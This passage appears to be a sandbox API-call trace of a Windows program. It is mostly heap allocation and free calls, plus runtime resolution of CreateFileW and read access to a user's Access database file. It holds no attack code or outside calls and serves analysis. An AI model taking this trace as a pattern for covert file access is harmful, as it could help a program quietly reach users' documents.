hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0076.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0076.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0076.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0076.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0076.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0076.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0076.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0076.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0076.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0076.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0076.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0076.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0076.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0076.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0076.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0076.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0076.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0076.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0076.199] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0076.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0076.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0076.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0076.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0076.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0076.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0076.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0076.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0076.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0076.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0076.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0076.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0076.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0076.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0076.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0076.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0076.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0076.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0076.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0076.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0076.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0076.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0076.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0076.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0076.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0076.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0076.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0076.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0076.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0076.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0076.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0076.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0076.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0076.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0076.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0076.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0076.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0076.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0076.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0076.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0076.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0076.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0076.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0076.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0076.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0076.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0076.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0076.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0076.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0076.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0076.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0076.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0076.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0076.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0076.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0076.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0076.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0076.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0076.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0076.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0076.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0076.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0076.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0076.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0076.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0076.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0076.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0076.201] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0076.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0076.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0076.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca718 [0076.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca718, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0076.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0076.202] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0076.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0076.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0076.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0076.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0076.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0076.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0076.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0076.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0076.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0076.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0076.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0076.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0076.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0076.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0076.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0076.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0076.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0076.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0076.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0076.203] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Database1.accdb" (normalized: "c:\\users\\fd1hvy\\documents\\database1.accdb"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0076.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0076.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9a40 [0076.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0076.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0076.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0076.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0076.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0076.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0076.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0076.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0076.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0076.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0076.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0076.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0076.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0076.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359a68 [0076.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0076.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0076.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0076.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0076.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0076.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0076.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0076.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0076.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0076.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0076.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0076.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0076.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0076.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0076.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0076.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0076.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0076.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0076.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0076.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0076.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0076.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0076.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0076.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0076.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0076.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0076.205] FreeLibrary (hLibModule=0x772d0000) returned 1 [0076.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0076.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0076.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0076.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0076.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0076.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0076.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0076.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0076.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0076.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0076.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0076.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0076.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0076.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0076.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0076.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0076.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0076.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0076.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0076.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0076.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0076.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0076.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0076.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0076.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0076.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0076.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0076.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0076.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0076.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0076.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0076.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0076.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0076.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0076.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0076.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0076.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0076.207] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0076.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0076.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0076.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.207] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0076.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0076.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0076.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0076.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0076.207] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0076.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0076.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0076.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0076.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0076.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0076.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0076.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0076.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0076.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0076.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0076.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 